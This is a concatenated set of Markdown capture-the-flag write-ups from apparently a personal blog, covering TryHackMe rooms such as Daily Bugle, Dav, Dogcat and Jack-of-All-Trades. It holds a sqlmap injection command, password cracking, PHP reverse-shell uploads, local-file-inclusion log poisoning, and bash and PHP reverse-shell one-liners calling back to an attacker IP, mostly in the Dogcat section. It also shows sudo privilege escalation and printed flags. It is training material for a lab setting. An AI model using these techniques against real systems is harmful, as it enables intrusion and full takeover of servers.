68:ed:7b:19:7f:ed:14:e6:18:98:6d:c5:88:30:aa:e9 (RSA) 25 | | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCbp89KqmXj7Xx84uhisjiT7pGPYepXVTr4MnPu1P4fnlWzevm6BjeQgDBnoRVhddsjHhI1k+xdnahjcv6kykfT3mSeljfy+jRc+2ejMB95oK2AGycavgOfF4FLPYtd5J97WqRmu2ZC2sQUvbGMUsrNaKLAVdWRIqO5OO07WIGtr3c2ZsM417TTcTsSh1Cjhx3F+gbgi0BbBAN3sQqySa91AFruPA+m0R9JnDX5rzXmhWwzAM1Y8R72c4XKXRXdQT9szyyEiEwaXyT0p6XiaaDyxT2WMXTZEBSUKOHUQiUhX7JjBaeVvuX4ITG+W8zpZ6uXUrUySytuzMXlPyfMBy8B 26 | | 256 5c:d6:82:da:b2:19:e3:37:99:fb:96:82:08:70:ee:9d (ECDSA) 27 | | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBKb+wNoVp40Na4/Ycep7p++QQiOmDvP550H86ivDdM/7XF9mqOfdhWK0rrvkwq9EDZqibDZr3vL8MtwuMVV5Src= 28 | | 256 d2:a9:75:cf:2f:1e:f5:44:4f:0b:13:c2:0f:d7:37:cc (ED25519) 29 | |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIP4TcvlwCGpiawPyNCkuXTK5CCpat+Bv8LycyNdiTJHX 30 | 31 | 80/tcp open http syn-ack Apache httpd 2.4.6 ((CentOS) PHP/5.6.40) 32 | |_http-favicon: Unknown favicon MD5: 1194D7D32448E1F90741A97B42AF91FA 33 | |_http-generator: Joomla! - Open Source Content Management 34 | | http-methods: 35 | |_ Supported Methods: GET HEAD POST OPTIONS 36 | | http-robots.txt: 15 disallowed entries 37 | | /joomla/administrator/ /administrator/ /bin/ /cache/ 38 | | /cli/ /components/ /includes/ /installation/ /language/ 39 | |_/layouts/ /libraries/ /logs/ /modules/ /plugins/ /tmp/ 40 | |_http-server-header: Apache/2.4.6 (CentOS) PHP/5.6.40 41 | |_http-title: Home 42 | 43 | 3306/tcp open mysql syn-ack MariaDB (unauthorized) 44 | ``` 45 | 46 | ### Access the web server, who robbed the bank? 47 | 48 | ``` 49 | Spiderman 50 | ``` 51 | 52 | ![](../images/dailybugle/Untitled.png) 53 | 54 | --- 55 | 56 | ![https://i.imgur.com/fREnB0x.png](https://i.imgur.com/fREnB0x.png) 57 | 58 | Hack into the machine and obtain the root user's credentials. 59 | 60 | ### What is the Joomla version? 61 | 62 | ``` 63 | # As you can see on the nmap report the blog is using joomla, let's use some tools to enumerate the version and see if there is something interesting.. 64 | # https://github.com/Tuhinshubhra/CMSeeK 65 | [✔] CMS URL: https://joomla.org 66 | [✔] Joomla Version: 3.7.0 67 | ``` 68 | 69 | ![](../images/dailybugle/Untitled1.png) 70 | 71 | Nice, now we have the version let's see if there is an exploit in this version on exploitdb for example. 72 | 73 | ![](../images/dailybugle/Untitled2.png) 74 | 75 | Yep ! There is a SQLi available ! 🙌 76 | 77 | ![](../images/dailybugle/Untitled3.png) 78 | 79 | The exploit tells us to basically use sqlmap, well.. let's do that I guess. 80 | 81 | ``` 82 | # sqlmap command 83 | sqlmap -u "http://10.10.85.30/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomla -T '#__users' --dump 84 | ``` 85 | 86 | If you want, you can use this exploit written with python 87 | 88 | [NinjaJc01/joomblah-3](https://github.com/NinjaJc01/joomblah-3) 89 | 90 | ![](../images/dailybugle/Untitled4.png) 91 | 92 | ``` 93 | 94 | [$] Found user : 'Super User', 'jonah', 'jonah@tryhackme.com', 95 | Hashed password : '$2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutm' 96 | ``` 97 | 98 | Nice this is exactly what we wanted, let's crack the password. 99 | 100 | ### What is Jonah's cracked password? 101 | 102 | ``` 103 | # Let's crack the hash with hashcat / john 104 | $2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutm 105 | ``` 106 | 107 | ![](../images/dailybugle/Untitled5.png) 108 | 109 | After ~40-45 minutes the password has been cracked : `spiderman123` 110 | 111 | Now that we have the administrator's password let's upload some reverse shell 👀 112 | 113 | ![](../images/dailybugle/Untitled6.png) 114 | 115 | Now that we successfully connected let's upload something. 116 | 117 | ![](../images/dailybugle/Untitled7.png) 118 | 119 | Go to the `Extensions/Templates/Templates` tab. 120 | 121 | And create a php page 122 | 123 | ![](../images/dailybugle/Untitled8.png) 124 | 125 | ##### Bonus, you can use my own extension to generate php shell and many more things ! 126 | 127 | [LasCC/Hack-Tools](https://github.com/LasCC/Hack-Tools) 128 | 129 | ![](../images/dailybugle/Untitled9.png) 130 | 131 | ![](../images/dailybugle/Untitled10.png) 132 | 133 | Now let's juste save and close the page to see the magic happen 😎 134 | 135 | ![](../images/dailybugle/Untitled11.png) 136 | 137 | And voilà ! You have successfully uploaded a reverse shell ! 138 | 139 | Now we can access the configuration of joomla `/var/www/html/configuration.php` 140 | 141 | ![](../images/dailybugle/Untitled12.png) 142 | 143 | ``` 144 | Password : 'nv5uz9r3ZEDzVjNu'; 145 | ``` 146 | 147 | ### What is the user flag? 148 | 149 | ![](../images/dailybugle/Untitled13.png) 150 | 151 | To see what is the name of the user I cd into the `/home` directory to list all of the available users, and the rest is pretty straightforward, just SSH into the account with the password that you have cracked earlier. 152 | 153 | ``` 154 | # First flag 155 | 27a260fe3cba712cfdedb1c86d80442e 156 | ``` 157 | 158 | ### What is the root flag? 159 | 160 | ![](../images/dailybugle/Untitled14.png) 161 | 162 | Payload → gtfobins 163 | 164 | [yum | GTFOBins](https://gtfobins.github.io/gtfobins/yum/#sudo) 165 | 166 | ``` 167 | # Root flag 168 | # cat /root/root.txt 169 | eec3d53292b1821868266858d7fa6f79 170 | ``` 171 | 172 | -------------------------------------------------------------------------------- /src/content/blog/dav.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: "Dav - TryHackMe" 3 | category: "THM" 4 | pubDate: 2020-05-30 5 | description: "Writeup for the Dav room on TryHackMe" 6 | --- 7 | [TryHackMe | Dav](https://tryhackme.com/room/bsidesgtdav) 8 | 9 | Read user.txt and root.txt 10 | 11 | ### Setup 12 | 13 | ``` 14 | ➜ TryHackMe nmap -A -vv 10.10.33.240 15 | ``` 16 | 17 | ``` 18 | 80/tcp open http syn-ack Apache httpd 2.4.18 ((Ubuntu)) 19 | | http-methods: 20 | |_ Supported Methods: POST OPTIONS GET HEAD 21 | |_http-server-header: Apache/2.4.18 (Ubuntu) 22 | |_http-title: Apache2 Ubuntu Default Page: It works 23 | ``` 24 | 25 | ``` 26 | ➜ TryHackMe gobuster dir -u http://10.10.33.240 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 27 | =============================================================== 28 | Gobuster v3.0.1 29 | by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) 30 | =============================================================== 31 | [+] Url: http://10.10.33.240 32 | [+] Threads: 10 33 | [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 34 | [+] Status codes: 200,204,301,302,307,401,403 35 | [+] User Agent: gobuster/3.0.1 36 | [+] Timeout: 10s 37 | =============================================================== 38 | 2020/05/30 16:54:40 Starting gobuster 39 | =============================================================== 40 | /webdav (Status: 401) 41 | ``` 42 | 43 | ``` 44 | # There is a creds to acces the page just google webdav default creds" 45 | http://xforeveryman.blogspot.com/2012/01/helper-webdav-xampp-173-default.html 46 | user: wampp 47 | pass: xampp 48 | ``` 49 | 50 | ![](https://imgur.com/BKDICjY.png) 51 | 52 | ``` 53 | # Don't try to crack the hash its a rabit hole (sad life :'c) 54 | wampp:$apr1$Wm2VTkFL$PVNRQv7kzqXQIHe14qKA91 55 | ``` 56 | 57 | Let's get a reverse shell on the server ! 🤑 58 | 59 | [Learning Pentesting with Metasploitable3: Exploiting WebDAV](https://resources.infosecinstitute.com/learning-pentesting-metasploitable3-exploiting-webdav-2/#gref) 60 | 61 | ``` 62 | ➜ TryHackMe curl –v --user wampp:xampp http://10.10.33.240/webdav/verify.txt -X PUT 63 | curl: (3) Failed to convert –v to ACE; string contains a disallowed character 64 | 65 | 66 | 67 | 201 Created 68 | 69 |

    Created

    70 |

    Resource /webdav/verify.txt has been created.

    71 |
    72 |
    Apache/2.4.18 (Ubuntu) Server at 10.10.33.240 Port 80
    73 | 74 | ``` 75 | 76 | ![](https://imgur.com/xtdInMA.png) 77 | 78 | Nice, let's try with a php reverse shell shall we ? 😃 79 | 80 | ### #1 user.txt 81 | 82 | ``` 83 | ➜ TryHackMe curl --user wampp:xampp http://10.10.33.240/webdav/reverse-shell.php --upload-file reverse-shell.php -X PUT 84 | ➜ TryHackMe nc -lvnp 4444 85 | ``` 86 | 87 | ![](https://imgur.com/iIe25rq.png) 88 | 89 | ``` 90 | $ cd /home 91 | $ ls 92 | merlin 93 | wampp 94 | $ cd merlin 95 | $ ls 96 | user.txt 97 | $ cat user.txt 98 | 449b40fe93f78a938523b7e4dcd66d2a 99 | ``` 100 | 101 | ### #2 root.txt 102 | 103 | ``` 104 | $ sudo -l 105 | Matching Defaults entries for www-data on ubuntu: 106 | env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin 107 | 108 | User www-data may run the following commands on ubuntu: 109 | (ALL) NOPASSWD: /bin/cat 110 | $ sudo cat /root/ 111 | cat: /root/: Is a directory 112 | $ sudo cat /root/root.txt 113 | 101101ddc16b0cdf65ba0b8a7af7afa5 114 | ``` 115 | 116 | 117 | -------------------------------------------------------------------------------- /src/content/blog/dogcat.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: "Dogcat - TryHackMe" 3 | category: "THM" 4 | pubDate: 2020-06-02 5 | description: "Writeup for the Dogcat room on TryHackMe" 6 | --- 7 | [TryHackMe | Dogcat](https://tryhackme.com/room/dogcat) 8 | 9 | ![](https://i.imgur.com/mj1rbea) 10 | 11 | I made this website for viewing cat and dog images with PHP. If you're feeling down, come look at some dogs/cats! 12 | 13 | **This machine may take a few minutes to fully start up.** 14 | 15 | --- 16 | 17 | ### Setup 18 | 19 | ``` 20 | ➜ TryHackMe nmap -A -vv 10.10.121.12 21 | ``` 22 | 23 | ``` 24 | 22/tcp open ssh syn-ack OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) 25 | | ssh-hostkey: 26 | | 2048 24:31:19:2a:b1:97:1a:04:4e:2c:36:ac:84:0a:75:87 (RSA) 27 | | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCeKBugyQF6HXEU3mbcoDHQrassdoNtJToZ9jaNj4Sj9MrWISOmr0qkxNx2sHPxz89dR0ilnjCyT3YgcI5rtcwGT9RtSwlxcol5KuDveQGO8iYDgC/tjYYC9kefS1ymnbm0I4foYZh9S+erXAaXMO2Iac6nYk8jtkS2hg+vAx+7+5i4fiaLovQSYLd1R2Mu0DLnUIP7jJ1645aqYMnXxp/bi30SpJCchHeMx7zsBJpAMfpY9SYyz4jcgCGhEygvZ0jWJ+qx76/kaujl4IMZXarWAqchYufg57Hqb7KJE216q4MUUSHou1TPhJjVqk92a9rMUU2VZHJhERfMxFHVwn3H 28 | | 256 21:3d:46:18:93:aa:f9:e7:c9:b5:4c:0f:16:0b:71:e1 (ECDSA) 29 | | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBBouHlbsFayrqWaldHlTkZkkyVCu3jXPO1lT3oWtx/6dINbYBv0MTdTAMgXKtg6M/CVQGfjQqFS2l2wwj/4rT0s= 30 | | 256 c1:fb:7d:73:2b:57:4a:8b:dc:d7:6f:49:bb:3b:d0:20 (ED25519) 31 | |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIIfp73VYZTWg6dtrDGS/d5NoJjoc4q0Fi0Gsg3Dl+M3I 32 | 33 | 80/tcp open http syn-ack Apache httpd 2.4.38 ((Debian)) 34 | | http-methods: 35 | |_ Supported Methods: GET HEAD POST OPTIONS 36 | |_http-server-header: Apache/2.4.38 (Debian) 37 | |_http-title: dogcat 38 | Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel 39 | ``` 40 | 41 | ### #1 What is flag 1? 42 | 43 | I'm going to try some basic LFI 44 | 45 | ![](https://imgur.com/IeJGwlC.png) 46 | 47 | ![](https://imgur.com/UMyhkfJ.png) 48 | 49 | I'm going to try with php filter let's see if this works.. 50 | 51 | [LFI Cheat Sheet](https://highon.coffee/blog/lfi-cheat-sheet/) 52 | 53 | ![](https://imgur.com/FXeOWux.png) 54 | 55 | ``` 56 | php://filter/convert.base64-encode/resource=cat 57 | # Let's decode the base64 to see the result 58 | 59 | ``` 60 | 61 | ![](https://imgur.com/jF0hO89.png) 62 | 63 | Nice ! We can see the php code let's see if there is something in the directory 64 | 65 | ``` 66 | php://filter/convert.base64-encode/resource=./cat/../index 67 | 68 | 69 | 70 | 71 | dogcat 72 | 73 | 74 | 75 | 76 |

    dogcat

    77 | a gallery of various dogs or cats 78 | 79 |
    80 |

    What would you like to see?

    81 |
    82 | 96 |
    97 | 98 | 99 | 100 | ``` 101 | 102 | There we go ! We have the php code let's see if we can do something with it 🤤 103 | 104 | So.. There is no way that we can exploit the php code so let's look at the nmap result and we have the apache version, let's see if we can see the log. 105 | 106 | ``` 107 | By default, you can find the Apache access log file at the following path: 108 | 109 | /var/log/apache/access. log. 110 | /var/log/apache2/access. log. 111 | /etc/httpd/logs/access_log. 112 | ``` 113 | 114 | If we try with this following url 115 | 116 | ``` 117 | php://filter/convert.base64-encode/resource=./cat/../../../../../../../../../../../../../var/log/apache2/access.log 118 | ``` 119 | 120 | There will be an error its because the code don't like the ".log" let's correct that 😃 121 | 122 | On the php code there is this ternary condition "\$\_GET["ext"]" let's use that at the end 123 | 124 | ![](https://imgur.com/25dLhcZ.png) 125 | 126 | Nice ! It worked !! 😵 127 | 128 | Let's decode the base64 to see the result 😊 129 | 130 | ``` 131 | 10.9.2.228 - - [02/Jun/2020:20:38:04 +0000] "GET /?view=php://filter/convert.base64-encode/resource=./cat/../../../../../../../../../../../../../var/log/apache2/access.log&ext HTTP/1.1" 200 2890 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0" 132 | ``` 133 | 134 | Now let's see if we can have an RCE attack 🤑 135 | 136 | ![](https://imgur.com/gZZJUJR.png) 137 | 138 | And there it is ! If we put "" on the user-agent we can execute code on the remote server. 139 | 140 | Let's get a reverse shell using the same method.. 141 | 142 | [php | GTFOBins](https://gtfobins.github.io/gtfobins/php/#reverse-shell) 143 | 144 | ``` 145 | 146 | php -r '$sock=fsockopen("10.9.2.228"),"",4444);exec("/bin/sh -i <&3 >&3 2>&3");' 147 | ``` 148 | 149 | ![](https://imgur.com/2bjNiUu.png) 150 | 151 | ``` 152 | $ cat flag.php 153 | 156 | ``` 157 | 158 | ### #2 What is flag 2? 159 | 160 | ``` 161 | $ cd .. 162 | $ pwd 163 | /var/www 164 | $ ls 165 | flag2_QMW7JvaY2LvK.txt 166 | html 167 | $ cat flag2_QMW7JvaY2LvK.txt 168 | THM{LF1_t0_RC3_aec3fb} 169 | ``` 170 | 171 | ### #3 What is flag 3? 172 | 173 | ``` 174 | $ sudo -l 175 | Matching Defaults entries for www-data on 17d35d82c239: 176 | env_reset, mail_badpass, 177 | secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin 178 | 179 | User www-data may run the following commands on 17d35d82c239: 180 | (root) NOPASSWD: /usr/bin/env 181 | ``` 182 | 183 | [https://gtfobins.github.io/gtfobins/env/#sudo](https://gtfobins.github.io/gtfobins/env/#sudo) 184 | 185 | ``` 186 | sudo env /bin/sh 187 | ``` 188 | 189 | ``` 190 | id 191 | uid=0(root) gid=0(root) groups=0(root) 192 | cd /root 193 | ls 194 | flag3.txt 195 | cat flag3.txt 196 | THM{D1ff3r3nt_3nv1ronments_874112} 197 | ``` 198 | 199 | ### #4 What is flag 4? 200 | 201 | ``` 202 | find / -type f -name *.sh 2>/dev/null 203 | /opt/backups/backup.sh 204 | /etc/init.d/hwclock.sh 205 | /lib/init/vars.sh 206 | /usr/local/lib/php/build/ltmain.sh 207 | /usr/share/debconf/confmodule.sh 208 | ``` 209 | 210 | ``` 211 | cd /opt/backups 212 | ls 213 | backup.sh 214 | backup.tar 215 | cat backup.sh 216 | #!/bin/bash 217 | tar cf /root/container/backup/backup.tar /root/container 218 | ``` 219 | 220 | Let's add a reverse shell on the bash script and get hopefully the last flag 🤓 221 | 222 | ``` 223 | echo '#!/bin/bash' > backup.sh;echo 'bash -i >& /dev/tcp/10.9.2.228/9002 0>&1' >> backup.sh 224 | ``` 225 | 226 | ``` 227 | ➜ ~ nc -lnvp 9002 228 | listening on [any] 9002 ... 229 | connect to [10.9.2.228] from (UNKNOWN) [10.10.121.12] 43500 230 | bash: cannot set terminal process group (5464): Inappropriate ioctl for device 231 | bash: no job control in this shell 232 | root@dogcat:~# ls 233 | ls 234 | container 235 | flag4.txt 236 | root@dogcat:~# cat flag4* 237 | cat flag4* 238 | THM{esc4l4tions_on_esc4l4tions_on_esc4l4tions_7a52b17dba6ebb0dc38bc1049bcba02d} 239 | root@dogcat:~# 240 | ``` 241 | 242 | 243 | -------------------------------------------------------------------------------- /src/content/blog/easy-steganography.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: "Easy Steganography - TryHackMe" 3 | category: "THM" 4 | pubDate: 2020-05-15 5 | description: "Writeup for the Easy Steganography room on TryHackMe" 6 | --- 7 | [TryHackMe | Easy Steganography](https://tryhackme.com/room/easysteganography) 8 | 9 | Download the zip file and start the hunt. Good luck! 10 | 11 | ### #1 Flag 1 12 | 13 | ``` 14 | ➜ TryHackMe zsteg -a flag1.jpeg 15 | [!] #> 16 | ``` 17 | 18 | As you can see there is something wrong with this image let's see the hex code of it 19 | 20 | ![](https://imgur.com/ASD7OKz.png) 21 | 22 | ``` 23 | ➜ TryHackMe strings flag1.jpeg | grep "St" 24 | D`St 25 | St3g4n0 26 | ``` 27 | 28 | ``` 29 | St3g4n0 30 | ``` 31 | 32 | ### #2 Flag 2 33 | 34 | ``` 35 | ➜ TryHackMe stegoveritas flag2.jpeg 36 | ``` 37 | 38 | ![](https://imgur.com/ecLbV9Q.png) 39 | 40 | ``` 41 | Algorithm 42 | ``` 43 | 44 | ### #3 Flag 3 45 | 46 | ``` 47 | ➜ TryHackMe stegoveritas flag3.jpeg 48 | ``` 49 | 50 | ``` 51 | comment: "The passphrase to this challenge is Math" 52 | ``` 53 | 54 | ### #4 Flag 4 55 | 56 | ``` 57 | ➜ TryHackMe strings flag4.jpeg 58 | ``` 59 | 60 | ![](https://imgur.com/VRHCURv.png) 61 | 62 | ``` 63 | TryHardered 64 | ``` 65 | 66 | 67 | -------------------------------------------------------------------------------- /src/content/blog/geolocating-images.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: "Geolocating Images - TryHackMe" 3 | category: "THM" 4 | pubDate: 2020-05-24 5 | description: "Writeup for the Geolocating Images on TryHackMe" 6 | --- 7 | [TryHackMe | Geolocating Images](https://tryhackme.com/room/geolocatingimages) 8 | 9 | Where is image 1? 10 | 11 | (Use Google Reverse Search and revel in all the airplanes it shows you, which by the way, isn't the right answer). 12 | 13 | Try Yandex Reverse Image search. Look at the differences! 14 | 15 | ### #1 Where in the world is image 1? The answer is the country name. 16 | 17 | ![](https://imgur.com/9QUIrGj.png) 18 | 19 | ![](https://imgur.com/1fkczwe.png) 20 | 21 | ``` 22 | China 23 | ``` 24 | 25 | --- 26 | 27 | Where was image 2 taken? Specifically, I'm looking for the name of the place that has likely set up the webcam. You'll know it when you see it! 28 | 29 | ### #2 Where was image 2 taken? 30 | 31 | ![](https://imgur.com/56Zh3s3.png) 32 | 33 | ``` 34 | Wrigleyville Sports 35 | ``` 36 | 37 | --- 38 | 39 | Please do not try to use reverse image searches for this one! Pay close attention to what is in the image. 40 | 41 | I want you to answer with the name of the place the webcam is facing. 42 | 43 | Note: the name of this location on Google Maps is not the right answer. If you take that location name and paste it back into search, you'll find out there's about a million of them. To make this harder, I'm looking for the name that specifically identifies this location. When you enter this name, it'll be the only one that turns up on Google Maps. 44 | 45 | ### #3 Where was image 3 taken? 46 | 47 | [Webcamtaxi Search Engine of Live World Webcams](https://www.webcamtaxi.com/en/search.html?searchword=paris&searchphrase=all) 48 | 49 | ![](https://imgur.com/Vful2V0.png) 50 | 51 | ![](https://imgur.com/eiWDGhl.png) 52 | 53 | ``` 54 | Meudon Observatory 55 | ``` 56 | 57 | --- 58 | 59 | Look at image 4. What do you see? What can you observe? 60 | 61 | ### #4 Where is image 4 taken? 62 | 63 | This is a easy one the is a popular cross way in London 64 | 65 | [Abbey Road](https://www.visitlondon.com/things-to-do/place/35809687-abbey-road) 66 | 67 | ``` 68 | Abbey Road 69 | ``` 70 | 71 | 72 | -------------------------------------------------------------------------------- /src/content/blog/git-happens.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: "Git Happens - TryHackMe" 3 | category: "THM" 4 | pubDate: 2020-08-21 5 | description: "Writeup for the Git Happens room" 6 | --- 7 | [TryHackMe | Git Happens](https://tryhackme.com/room/githappens) 8 | 9 | Boss wanted me to create a prototype, so here it is! We even used something called "version control" that made deploying this really easy! 10 | 11 | Can you find the password to the application? 12 | 13 | --- 14 | 15 | ### Setup 16 | 17 | ``` 18 | └──╼ $ nmap -A -T4 10.10.58.41 19 | ``` 20 | 21 | ``` 22 | 80/tcp open http nginx 1.14.0 (Ubuntu) 23 | | http-git: 24 | | 10.10.58.41:80/.git/ 25 | | Git repository found! 26 | |_ Repository description: Unnamed repository; edit this file 'description' to name the... 27 | | http-methods: 28 | |_ Supported Methods: GET HEAD 29 | |_http-server-header: nginx/1.14.0 (Ubuntu) 30 | |_http-title: Super Awesome Site! 31 | Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel 32 | ``` 33 | 34 | As you can see the nmap scan found a ".git" repertory on the website, let's use some tools to get all the data. 35 | 36 | [internetwache/GitTools](https://github.com/internetwache/GitTools) 37 | 38 | ![](https://i.imgur.com/XXygrPA.png) 39 | 40 | ``` 41 | └──╼ $ ./gitdumper.sh http://10.10.58.41/.git/ . 42 | ``` 43 | 44 | Once the dumper script get all the data let's use the extractor script to have all the source code. 45 | 46 | ![](https://i.imgur.com/8DyZR2H.png) 47 | 48 | ``` 49 | └──╼ $ ./extractor.sh ~/Desktop/TryHackMe/git-thm/GitTools/Dumper/ . 50 | ``` 51 | 52 | ![](https://i.imgur.com/a53y7oc.png) 53 | 54 | As you can see the script created some directory, let's see if the password is in there. 55 | 56 | ### **#1 Find the Super Secret Password** 57 | 58 | ![](https://i.imgur.com/SzdvdmG.png) 59 | 60 | ``` 61 | Th**_**_*_****_****_******_*******! 62 | ``` 63 | 64 | 65 | -------------------------------------------------------------------------------- /src/content/blog/jack-of-all-trades.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: "Jack-of-All-Trades - TryHackMe" 3 | category: "THM" 4 | pubDate: 2020-06-28 5 | description: "Writeup for the Jack-of-All-Trades - boot-to-root originally designed for Securi-Tay 2020" 6 | --- 7 | [TryHackMe | Jack-of-All-Trades](https://tryhackme.com/room/ctfcollectionvol2) 8 | 9 | Jack is a man of a great many talents. The zoo has employed him to capture the 10 | penguins due to his years of penguin-wrangling experience, but all is not as it seems... 11 | 12 | We must stop him! Can you see through his facade of a forgetful old toy-maker and bring this lunatic down? 13 | 14 | --- 15 | 16 | ### Setup 17 | 18 | ``` 19 | nmap -A -vv 10.10.134.255 20 | ``` 21 | 22 | ``` 23 | 22/tcp open http syn-ack Apache httpd 2.4.10 ((Debian)) 24 | | http-methods: 25 | |_ Supported Methods: GET HEAD POST OPTIONS 26 | |_http-server-header: Apache/2.4.10 (Debian) 27 | |_http-title: Jack-of-all-trades! 28 | |_ssh-hostkey: ERROR: Script execution failed (use -d to debug) 29 | 30 | 80/tcp open ssh syn-ack OpenSSH 6.7p1 Debian 5 (protocol 2.0) 31 | | ssh-hostkey: 32 | | 1024 13:b7:f0:a1:14:e2:d3:25:40:ff:4b:94:60:c5:00:3d (DSA) 33 | | ssh-dss AAAAB3NzaC1kc3MAAACBANucPy+D67M/cKVTYaHYYpt9bqPviYbWW/4+BFnUOQoNordc9Pc+8CauJqNFiebIqpKYKXhpEAt82m1IjQh8EmWdJYcQnkMFgukM3/mGjngXTbUO8vAbi53Zy8wwOaBlmRK9mvfAYEWPkcjzRmYgSp51TgEtSGWIyAkc1Lx6YVtDAAAAFQCsIgZJlrsYvAtF7Rmho7lIdn0WOwAAAIEApri35SyOophhqX45JcDpVASe3CSs8tPMGoOc0I9ZtTGt5qyb1cl7N3tXsP6mlrw4d4YNo8ct0w6TjsxPcJjGitRQ+SILWHy72XZ5Chde6yewKB5BeBjXrYvRR1rW+Tpia5kyjB4s0mGB7o3FMjX/dT+ISqYvZeVa7mQnBo0f0XMAAACAP89Ag2kmcs0FBt7KCBieH3UB6gF+LdeRVJHio5p4VQ8cTY1NZDyWqudS1TJq1BAToJSz9MqwUwzlILjRjuGQtylpssWSRbHyM0aqmJdORSMOCMUiEwyfk6T8+Vmama/AN7/htZeWBjWVeVEnbYJJQ6kPSCvZodMdOggYXcv32CA= 34 | | 2048 91:0c:d6:43:d9:40:c3:88:b1:be:35:0b:bc:b9:90:88 (RSA) 35 | | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDbCwl2kyYWpv1DPDF0xQ5szNR1muMph6gJMJFw9VubKkSvHMWfg7CaCNcyo1QR5dg9buIygIGab8e9aigJdjQUY4XeBejwGe+vAA8RtPMoiLclR6g5qAqVQSeZ2FBzMrmkyKIgsSDb8tP+czpzn/Gp1HzDtiYUvleTvO2xEZ3k2Xz8YDvPlkV4zAIPzZSSZ8BABPYsBrePIwMpr/ZjeeiE59DlkUIv8x8M0z9KOls9zaeqFsbWrfMZzFgtPP+KILN6GrGijxgcGq5mDwvr67oHL3T3FtpReE+UZ/CafmzO/2Ls8XstmUiNeMaNBYtc6703/84bpL0uLp/pkILS8eqX 36 | | 256 a3:fb:09:fb:50:80:71:8f:93:1f:8d:43:97:1e:dc:ab (ECDSA) 37 | | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBO4p2E6NglzDeP40tJ42LjWaVrOcINmy42cspAv8DSzGD0K+V3El/tyGBxCJlMMR7wbN0968CQl61x0AkkAHLFk= 38 | | 256 65:21:e7:4e:7c:5a:e7:bc:c6:ff:68:ca:f1:cb:75:e3 (ED25519) 39 | |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIC6jYsDJq1mWTDx7D+p3mMbqXhu9OhhW2p1ickLCdZ9E 40 | Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel 41 | ``` 42 | 43 | As you can see by the nmap scan the port 22 is a web server. 44 | 45 | ![](https://imgur.com/HbuGSmv.png) 46 | 47 | [How to allow a restricted port?](https://support.mozilla.org/en-US/questions/1083282#question-reply) 48 | 49 | ![](https://imgur.com/8MM4L6y.png) 50 | 51 | ![](https://imgur.com/BAAHVL1.png) 52 | 53 | ![](https://imgur.com/x9t2KSO.png) 54 | 55 | Nice ! It worked, let's see if there is some hidden directory 😊 56 | 57 | ``` 58 | ➜ TryHackMe gobuster dir -u http://10.10.134.255:22/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 59 | ``` 60 | 61 | ![](https://imgur.com/xrD1K8Z.png) 62 | 63 | On source code of the homepage you can see there is some hidden message and a assets called "assets/stego.jpg" let's download the image and decode the message shall we ? 64 | 65 | ![](https://imgur.com/Eb7xkuj.png) 66 | 67 | ``` 68 | Remember to wish Johny Graves well with his crypto jobhunting! 69 | His encoding systems are amazing! Also gotta remember your password: u?WtKSraq 70 | ``` 71 | 72 | ![](https://imgur.com/XuUoZk8.png) 73 | 74 | Well, let's try the other images 😞 75 | 76 | ![](https://imgur.com/VvCRC8g.png) 77 | 78 | ![](https://imgur.com/pDG3iCg.png) 79 | 80 | ``` 81 | Username: jackinthebox 82 | Password: TplFxiSHjY 83 | ``` 84 | 85 | Great ! we found some credentials let's find the cms 🤨 86 | 87 | Ok ! I found it, to find the cms you need to go to the homepage and see the source code of the page. 88 | 89 | ![](https://imgur.com/1Dzbs6u.png) 90 | 91 | ![](https://imgur.com/g1MXfqH.png) 92 | 93 | ![](https://imgur.com/f4nDpbE.png) 94 | 95 | Let's decode the hidden message 😊 96 | 97 | ![](https://imgur.com/nlyCJfG.png) 98 | 99 | ``` 100 | Remember that the credentials to the recovery login are hidden on the homepage! 101 | I know how forgetful you are, so here's a hint: bit.ly/2TvYQ2S 102 | ``` 103 | 104 | This is just a hint, but we already have the credentials let's use it. 105 | 106 | ![](https://imgur.com/Ovwwmvk.png) 107 | 108 | ![](https://imgur.com/XLSDYwm.png) 109 | 110 | Ok, this is some basic RCE let's use the variable "?cmd" 111 | 112 | ![](https://imgur.com/oarM6xv.png) 113 | 114 | Let's see if thre is something on the /home path 115 | 116 | ![](https://imgur.com/wP495Qk.png) 117 | 118 | ![](https://imgur.com/4WFCneV.png) 119 | 120 | Let's crack the password of the ssh user 'jack' with the given wordlist, we will use hydra. 121 | 122 | ``` 123 | ➜ TryHackMe hydra -l jack -P jack_wordlist.txt 10.10.134.255 -s 80 ssh 124 | 